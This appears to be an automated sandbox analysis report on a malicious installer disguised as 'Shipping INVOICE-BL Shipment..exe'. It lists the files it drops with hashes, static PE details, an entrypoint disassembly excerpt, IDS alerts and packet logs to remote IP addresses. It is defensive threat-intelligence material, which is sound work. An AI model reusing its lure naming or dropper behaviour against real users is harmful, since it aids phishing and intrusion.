                                                                                                                                  SHA-256:301A735BCB6DE1DE09D0B9098228A419954404D8AA575F40AD82FC3A84403E35
                                                                                                                                  SHA-512:5B80AEBC3BEC840CE2ED024E1D6551F67E6DC7F611FDE1F054F7A4053AECDE72460517C5203672694E98DBE9F9C97CFEE2CF9A5FB39DCDCB17862051039D3FEA
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<VCPlatformConfigurationFile ...Version="8.00"...>.. <Platform ....Name="VCProjectEngine.dll" ....Identifier="Win32"....>....<Directories .....Include="$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(VCInstallDir)PlatformSDK\include;$(FrameworkSDKDir)include".....Library="$(VCInstallDir)lib;$(VCInstallDir)atlmfc\lib;$(VCInstallDir)atlmfc\lib\i386;$(VCInstallDir)PlatformSDK\lib;$(FrameworkSDKDir)lib;$(VSInstallDir);$(VSInstallDir)lib".....Path="$(VCInstallDir)bin;$(VCInstallDir)PlatformSDK\bin;$(VSInstallDir)Common7\Tools\bin;$(VSInstallDir)Common7\tools;$(VSInstallDir)Common7\ide;$(ProgramFiles)\HTML Help Workshop;$(FrameworkSDKDir)bin;$(FrameworkDir)$(FrameworkVersion);$(VSInstallDir);$(VSInstallDir)\SDK\v2.0\bin;$(SystemRoot)\SysWow64;$(FxCopDir);$(PATH)".....Reference="$(FrameworkDir)$(FrameworkVersion);$(VCInstallDir)atlmfc\lib".....Source="$(VCInstallDir)atlmfc\src\mfc;$(VCInstallDir)atlmfc\src\mfcm;$(VCInstallDir)atlmfc\src\atl;$(
                                                                                                                                  C:\Users\user\AppData\Local\Temp\manage\mms\WordExceptList.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3965
                                                                                                                                  Entropy (8bit):4.628651510242669
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:J9EFoF4F+FYwFkkkOzycs608uXPfzW6up8JiJHhwU9gvzu/6v1wtgETtkbvcIEeP:JpCHncA75Jz
                                                                                                                                  MD5:EF0EA2A1ECE97BE3CF9C9F1D30670E34
                                                                                                                                  SHA1:B960BCB826DA726AB2D919EEF781EE586DF4D607
                                                                                                                                  SHA-256:BA85D3915E513AF98861E7AD82A42E80D957CE52A71463E6E34609C34F3A0E1C
                                                                                                                                  SHA-512:CA23AD61BAEF5E5E96331D7DB2D645D657FB692E4641D364D94F703CDEDDE7C2FCCBBB5939DFA2B43CE07E767F51F6EF72FE1ACE58A6CA47D4DDCCD7B6799443
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <block-list:block-list xmlns:block-list="http://openoffice.org/2001/block-list"><block-list:block block-list:abbreviated-name="BCom"/><block-list:block block-list:abbreviated-name="BCom(Ed)"/><block-list:block block-list:abbreviated-name="BComHons"/><block-list:block block-list:abbreviated-name="BCom(Hons)"/><block-list:block block-list:abbreviated-name="BCompt"/><block-list:block block-list:abbreviated-name="BCur"/><block-list:block block-list:abbreviated-name="BCur(Ed et Adm)"/><block-list:block block-list:abbreviated-name="BCur(I et A)"/><block-list:block block-list:abbreviated-name="BDiac"/><block-list:block block-list:abbreviated-name="BEcon"/><block-list:block block-list:abbreviated-name="BEcon(Ed)"/><block-list:block block-list:abbreviated-name="BEconSc"/><block-list:block block-list:abbreviated-name="BEd"/><block-list:block block-list:abbreviated-name="BEdPh"/><block-list:block block-list:abbreviated-name="BHuish"/><block-list:block block-list:abbreviated-name="BIng"/><block-li
                                                                                                                                  C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):18552
                                                                                                                                  Entropy (8bit):6.326879340022009
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:1vh8+o5DhIpvK2HSlajv9J1L/gLCcY9jBJJx+:1JuQ5DgL38TJx+
                                                                                                                                  MD5:0C74A8A66DB361A91A8E46E256234B9D
                                                                                                                                  SHA1:B4EEB6CC71C68264B348824997930426DE1E6C41
                                                                                                                                  SHA-256:245BC780CA69A4B6019625BD1046D7C1C0F4720B795BA2D091AC62B9B7C73DE1
                                                                                                                                  SHA-512:CFBCA14304D8A168944381A139D0299516188C2914F78267CB75C9DB903CB1562BB48E6B540C39C3A9D436180D54B18772C0337C9711808829C20F837C5FEAC9
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  C:\Users\user\AppData\Local\Temp\medium\listadmin\glance_config\eDbgJitUI.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (Windows CE) ARM, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2560
                                                                                                                                  Entropy (8bit):2.8091845512006928
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:6gclPCaIZWy+cAcMphg2R5WPWghhrSZP3CE3h:l+EWAAcwCgWPVhrSh3CEx
                                                                                                                                  MD5:BC977F27DB75D9E99EF4733F6603AD0C
                                                                                                                                  SHA1:799BAF9192BDE18BF0B260840FFE5ADA27CD13A3
                                                                                                                                  SHA-256:BEC1776C798A4DCED9C153A9739FADAAC1D80AF11FB652275A6038396C960CA6
                                                                                                                                  SHA-512:748AC90A592760BA02247A4C31786D5BB65414E1465A2EE81B3D658A856CCA94C07EC89F3A24DBEF3208258ED7F6F0DB990126EA6BBE8654D1A87C97D494BE07
                                                                                                                                  Malicious:false
                                                                                                                                  C:\Users\user\AppData\Local\Temp\nse53A7.tmp
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):657776
                                                                                                                                  Entropy (8bit):6.748405173068804
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:sGgbmgcb04MKJuQxUSw4YNXdJvE/qwakLvDupEScr2d0:TlgcxrJuQ/TCtAqbpHc6d0
                                                                                                                                  MD5:393215B51E4C54A6950B13796ABEA20F
                                                                                                                                  SHA1:77225F7A62F29560C7087176E187ED2012E0A25E
                                                                                                                                  SHA-256:DA2F2572CCA884673B95FF9DD3C8BDF4598240F45F5206F110DF99EC6289EECA
                                                                                                                                  SHA-512:C48A8C603B18790E83A19BAAFA7B5C1443C48163AA84D0CDCD3142F48C84DF971C0EAC8DA6B28F724B167C06E3B439E87A8DD116032701975CB691BF140CE96F
                                                                                                                                  Malicious:false
                                                                                                                                  C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\dbsvcui.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):16896
                                                                                                                                  Entropy (8bit):3.838968174263835
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:7YndHVTZZip3YBq2nieYqHAAUsJ3M3IDLbKDnbNWcuTWN:EdHVnG38DieFHcsJcYDL2DnpWbTW
                                                                                                                                  MD5:585AC8F0CA13C1326C5E562B509B8E2D
                                                                                                                                  SHA1:B884490E95CEBA559E50E48F22E810D9E5925792
                                                                                                                                  SHA-256:5551259AE036773BB93168503FE1BA75EA2E5718C02172FDCAE6E20B4B80CA25
                                                                                                                                  SHA-512:88E734E475D3A6A721E18B9FB1E80231CA81509C6B20B9927DDE5A1F16D69FE118C56A1EDC655E492D6388037AE748E39D9A3FE8E4F957BC83703F18A2E5E237
                                                                                                                                  Malicious:false
                                                                                                                                  C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\number.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):134
                                                                                                                                  Entropy (8bit):4.544675981202402
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:vFWWMNCmVijhGOjaESwJFBngKbWJkZGWGOjaESydZMqgKbWJRqT:TM3VijhGif0KykZGWGiJuTKyET
                                                                                                                                  MD5:A75CA31F7ED72AF18B51615986EDA289
                                                                                                                                  SHA1:59CD60370C065551CC3B3EFEF5901B76DE930771
                                                                                                                                  SHA-256:4C2CE6779620133C87EC716FA06DA2A3A9EA97862AC0B7AC1051B474573EE93E
                                                                                                                                  SHA-512:3BE3A461AFE5B0527719A1F1103BD0CB836C8F4340DB5192C99BF0121C9F3D3F9ECB0127E6C82F1FF830E297AF54199706671053CC6BE4CC91C29F6180C96010
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version='1.0'?>..<data>...<circle>....<radius>12</radius>...</circle>...<circle>....<radius>37.5</radius>...</circle>..</data>
                                                                                                                                  C:\Users\user\AppData\Roaming\panel\box\xbox\67.opends60.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):47
                                                                                                                                  Entropy (8bit):3.9953502875256306
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:p/uBallM/lErm1F:RcasDP
                                                                                                                                  MD5:E4E4F671BDE80749EA2EB465FDA2568D
                                                                                                                                  SHA1:5CA98566B46E8BC5538399CB05F85A8F41DDE61F
                                                                                                                                  SHA-256:82F834504F7C6FCE706E28083E8A93F52A61A84918B0CDCBDC0B1A70B505B1D1
                                                                                                                                  SHA-512:61E8CED4EE21CED48F0D4FBCCE3CCC35546DBAFB6B6C63A73503205740830BA11452E44A668AEE123F72A1C75499B5F9A270E85B56BF782EA79A4D695EEDAA08
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: ......L....9....)..._srv_senddone.opends60.dll.
                                                                                                                                  C:\Users\user\AppData\Roaming\panel\box\xbox\msvsotbcct.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):6144
                                                                                                                                  Entropy (8bit):4.623117599850433
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:K1DJcZB62DHzW6st3+K9XEWCPCNjaqNyyWPV:K1dIH1sD6WCKNjaMyyWN
                                                                                                                                  MD5:743B7D073C1BFB883B9F97CA1D5DDF94
                                                                                                                                  SHA1:01AFEC884E6B5D1CA5ECCB47E18C52CFF44882FA
                                                                                                                                  SHA-256:1A0E9EC2FD53F7D0CE83BF4745D44681412724250046F0A88C54A630EE5A9A59
                                                                                                                                  SHA-512:5947FC4DC66F476289EECA57E7D2CB0766528602DA8C124C62A544ACC4DDD38944B15ECFE9651A74764379797A5B782975DC7949EC37A3C6E6757E5477502979
                                                                                                                                  Malicious:false
                                                                                                                                  C:\Users\user\AppData\Roaming\pkgs\rcxditui.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):5120
                                                                                                                                  Entropy (8bit):3.152590437417521
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:KqiJ6OqhgmLwQpXMbqwcI65y7+OiaC+IZWo6zqhpm3F5WPWghnpgX:jOqhiZF6zSEWEOjWPVn0
                                                                                                                                  MD5:CC869C04E8771D08397DC86374FE5A5E
                                                                                                                                  SHA1:D7CD17B9607538DCDD6FC267EE504B37740992FF
                                                                                                                                  SHA-256:420007C3E0A76AC880679F323653D3B9321832F578CA4DC1C2A1E5775A0F77DD
                                                                                                                                  SHA-512:684114317AB54248D20727058F58E592CFFEE865E876B8155C4426EE71CF15BFACAEE07E2C9EF49C8D3F99CF6F0E20AE8800D2DF88F0550E5304AB39BA468EF4
                                                                                                                                  Malicious:false
                                                                                                                                  C:\Users\user\AppData\Roaming\pkgs\vjscsvr.exe
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):46784
                                                                                                                                  Entropy (8bit):6.38572528005874
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:iiLuedE09FC5Ja5gR/2hyzsiPKxUd+0PpOmMKbfZD8L3d/o+/j:iiLu+LsjPR/2AzsiP3+KOmdbfZD8R/ou
                                                                                                                                  MD5:2483FFB732EFA8A92F6A78B4E97C07EA
                                                                                                                                  SHA1:4929D6076B400EB8C92D941E7C2898FEF282094D
                                                                                                                                  SHA-256:8713626CFB6493E4905448C96BEA3F77C0A05876208B3F87BF95D13166D53A70
                                                                                                                                  SHA-512:F71E5DBB2F985DCD7A0CB1C14D602A05964F15D6E32A859FA48710EB34AF9540448A86E27AD0E0BF3136465C6C142BCC473F74C215B248F07E8C641AF168FDE2
                                                                                                                                  Malicious:false
                                                                                                                                  C:\Users\user\AppData\Roaming\pkgs\x-lz4.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1953
                                                                                                                                  Entropy (8bit):5.19612754901248
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cFQHd6hH3nRBS46jdeBOfGguEeB5NCgZ2clMfeBtIQxq3vQjS/LMSkPYF:e13nRBSDheBOfGguEeBPCgZ2clMWBtIP
                                                                                                                                  MD5:D36051864C2DB5D4112463629F26A091
                                                                                                                                  SHA1:24BF1CC82EBBCCFEE903A0F11E45D40D8F93BF0E
                                                                                                                                  SHA-256:E0B10A6875F8FAB58C1E9C58900CB5363DD7ABFC5921C9FBC67D5A12212E7B5F
                                                                                                                                  SHA-512:0F21BEA6ED7EA348E295FD551400F1928407C635077B7457C02B089D0C6B215DE818BFE2D7A5796DB82512EF8F4A91B053A60303A6737FC3872ACE861D8F83C3
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="application/x-lz4">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment>LZ4 archive</comment>. <comment xml:lang="ca">arxiu LZ4</comment>. <comment xml:lang="cs">archiv LZ4</comment>. <comment xml:lang="da">LZ4-arkiv</comment>. <comment xml:lang="de">LZ4-Archiv</comment>. <comment xml:lang="el">........... ...... LZ4</comment>. <comment xml:lang="en_GB">LZ4 archive</comment>. <comment xml:lang="es">archivador LZ4</comment>. <comment xml:lang="eu">LZ4 artxiboa</comment>. <comment xml:lang="fi">LZ4-arkisto</comment>. <comment xml:lang="fr">archive LZ4</comment>. <comment xml:lang="ga">Cartlann LZ4</comment>. <comment xml:lang="gl">Arquivo LZ4</comment>. <comment xml:lang="he">...... LZ4</comment>. <comment xml:lang="hr">LZ4 arhiva</comment>. <comment xml:lang="hu">LZ4 arch.vum</comment>. <comment xml:lang

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                  Entropy (8bit):7.87849220099009
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File size:438107
                                                                                                                                  MD5:579ba39b6a146080ef6481591440e445
                                                                                                                                  SHA1:06bfc3b47e1ad6a35e10cb4a1edee6c563710107
                                                                                                                                  SHA256:d8d9bb65ea3637fda09488baada0c9b387e0619b7c430b93c8a0fa2d8b489bc1
                                                                                                                                  SHA512:bc2c920da35971ea6a6dfa8fc4f49829d6ba1eeae9589207b1f77a6e5f66d66dcb87396aadce266a61652f6fdfbe40503b9183af5f5ce26fa6cc9218df1597b9
                                                                                                                                  SSDEEP:12288:GanGnRPRnPSuPSw4YxX/Jva/qw0kLvDBZNC1J:8PhS7T8v+kW2J

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:90c8e472b85c261a

                                                                                                                                  Static PE Info

                                                                                                                                  General

                                                                                                                                  Entrypoint:0x4033a9
                                                                                                                                  Entrypoint Section:.text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x5DF6D4F7 [Mon Dec 16 00:51:03 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 7c2c71dfce9a27650634dc8b1ca03bf0

                                                                                                                                  Entrypoint Preview

                                                                                                                                  Instruction
                                                                                                                                  sub esp, 00000184h
                                                                                                                                  push ebx
                                                                                                                                  push esi
                                                                                                                                  push edi
                                                                                                                                  xor ebx, ebx
                                                                                                                                  push 00008001h
                                                                                                                                  mov dword ptr [esp+18h], ebx
                                                                                                                                  mov dword ptr [esp+10h], 0040A130h
                                                                                                                                  mov dword ptr [esp+20h], ebx
                                                                                                                                  mov byte ptr [esp+14h], 00000020h
                                                                                                                                  call dword ptr [004080A8h]
                                                                                                                                  call dword ptr [004080A4h]
                                                                                                                                  and eax, BFFFFFFFh
                                                                                                                                  cmp ax, 00000006h
                                                                                                                                  mov dword ptr [0042F42Ch], eax
                                                                                                                                  je 00007F43E0572AA3h
                                                                                                                                  push ebx
                                                                                                                                  call 00007F43E0575BA3h
                                                                                                                                  cmp eax, ebx
                                                                                                                                  je 00007F43E0572A99h
                                                                                                                                  push 00000C00h
                                                                                                                                  call eax
                                                                                                                                  mov esi, 00408298h
                                                                                                                                  push esi
                                                                                                                                  call 00007F43E0575B1Fh
                                                                                                                                  push esi
                                                                                                                                  call dword ptr [004080A0h]
                                                                                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                                                                                  cmp byte ptr [esi], bl
                                                                                                                                  jne 00007F43E0572A7Dh
                                                                                                                                  push 0000000Ah
                                                                                                                                  call 00007F43E0575B77h
                                                                                                                                  push 00000008h
                                                                                                                                  call 00007F43E0575B70h
                                                                                                                                  push 00000006h
                                                                                                                                  mov dword ptr [0042F424h], eax
                                                                                                                                  call 00007F43E0575B64h
                                                                                                                                  cmp eax, ebx
                                                                                                                                  je 00007F43E0572AA1h
                                                                                                                                  push 0000001Eh
                                                                                                                                  call eax
                                                                                                                                  test eax, eax
                                                                                                                                  je 00007F43E0572A99h
                                                                                                                                  or byte ptr [0042F42Fh], 00000040h
                                                                                                                                  push ebp
                                                                                                                                  call dword ptr [00408040h]
                                                                                                                                  push ebx
                                                                                                                                  call dword ptr [00408284h]
                                                                                                                                  mov dword ptr [0042F4F8h], eax
                                                                                                                                  push ebx
                                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                                  push 00000160h
                                                                                                                                  push eax
                                                                                                                                  push ebx
                                                                                                                                  push 00429858h
                                                                                                                                  call dword ptr [00408178h]
                                                                                                                                  push 0040A1ECh

                                                                                                                                  Rich Headers

                                                                                                                                  Programming Language:
                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x853c | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3f000 | 0x4340 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x294 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6455 | 0x6600 | False | 0.667356004902 | data | 6.43794179006 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x134a | 0x1400 | False | 0.459765625 | data | 5.23641914595 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x25538 | 0x600 | False | 0.461588541667 | data | 4.12893654735 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x30000 | 0xf000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x3f000 | 0x4340 | 0x4400 | False | 0.12890625 | data | 2.33445296823 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x3f310 | 0x10a8 | data | English | United States
RT_ICON | 0x403b8 | 0xea8 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x41260 | 0x8a8 | data | English | United States
RT_ICON | 0x41b08 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x42070 | 0x468 | data | English | United States
RT_ICON | 0x424d8 | 0x2e8 | data | English | United States
RT_ICON | 0x427c0 | 0x128 | data | English | United States
RT_DIALOG | 0x428e8 | 0xb4 | data | English | United States
RT_DIALOG | 0x429a0 | 0x120 | data | English | United States
RT_DIALOG | 0x42ac0 | 0x202 | data | English | United States
RT_DIALOG | 0x42cc8 | 0xf8 | data | English | United States
RT_DIALOG | 0x42dc0 | 0xee | data | English | United States
RT_GROUP_ICON | 0x42eb0 | 0x68 | data | English | United States
RT_MANIFEST | 0x42f18 | 0x423 | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Import
KERNEL32.dll | SetEnvironmentVariableA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, Sleep, GetTickCount, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, SetFileAttributesA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileTime, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CloseHandle, lstrcmpiA, GlobalUnlock, GetDiskFreeSpaceA, lstrcmpA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, SetFilePointer, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, MultiByteToWideChar, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll | GetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetForegroundWindow, ShowWindow, SetWindowLongA, SendMessageTimeoutA, FindWindowExA, IsWindow, AppendMenuA, TrackPopupMenu, CreatePopupMenu, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
GDI32.dll | SelectObject, SetTextColor, SetBkMode, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, GetDeviceCaps, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                                                                                                                                  Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/26/20-15:08:39.139293 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49766 | 34.102.136.180 | 192.168.2.4
11/26/20-15:08:44.471838 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49767 | 34.102.136.180 | 192.168.2.4
11/26/20-15:08:55.246997 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49769 | 75.126.100.11 | 192.168.2.4
11/26/20-15:09:05.767720 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49771 | 34.102.136.180 | 192.168.2.4

                                                                                                                                  TCP Packets

                                                                                                                                  Nov 26, 2020 15:09:00.310724974 CET4977080192.168.2.495.215.210.10
                                                                                                                                  Nov 26, 2020 15:09:00.427397013 CET804977095.215.210.10192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:00.427512884 CET4977080192.168.2.495.215.210.10
                                                                                                                                  Nov 26, 2020 15:09:00.427666903 CET4977080192.168.2.495.215.210.10
                                                                                                                                  Nov 26, 2020 15:09:00.543589115 CET804977095.215.210.10192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:00.543806076 CET804977095.215.210.10192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:00.543859005 CET804977095.215.210.10192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:00.543992996 CET4977080192.168.2.495.215.210.10
                                                                                                                                  Nov 26, 2020 15:09:00.544039965 CET4977080192.168.2.495.215.210.10
                                                                                                                                  Nov 26, 2020 15:09:00.659297943 CET804977095.215.210.10192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:05.636172056 CET4977180192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:09:05.652481079 CET804977134.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:05.652625084 CET4977180192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:09:05.652915001 CET4977180192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:09:05.669075966 CET804977134.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:05.767719984 CET804977134.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:05.767754078 CET804977134.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:05.767883062 CET4977180192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:09:05.767950058 CET4977180192.168.2.434.102.136.180
                                                                                                                                  Nov 26, 2020 15:09:05.785839081 CET804977134.102.136.180192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:10.998608112 CET4977280192.168.2.4165.227.229.15
                                                                                                                                  Nov 26, 2020 15:09:11.026669025 CET8049772165.227.229.15192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:11.026842117 CET4977280192.168.2.4165.227.229.15
                                                                                                                                  Nov 26, 2020 15:09:11.027050972 CET4977280192.168.2.4165.227.229.15
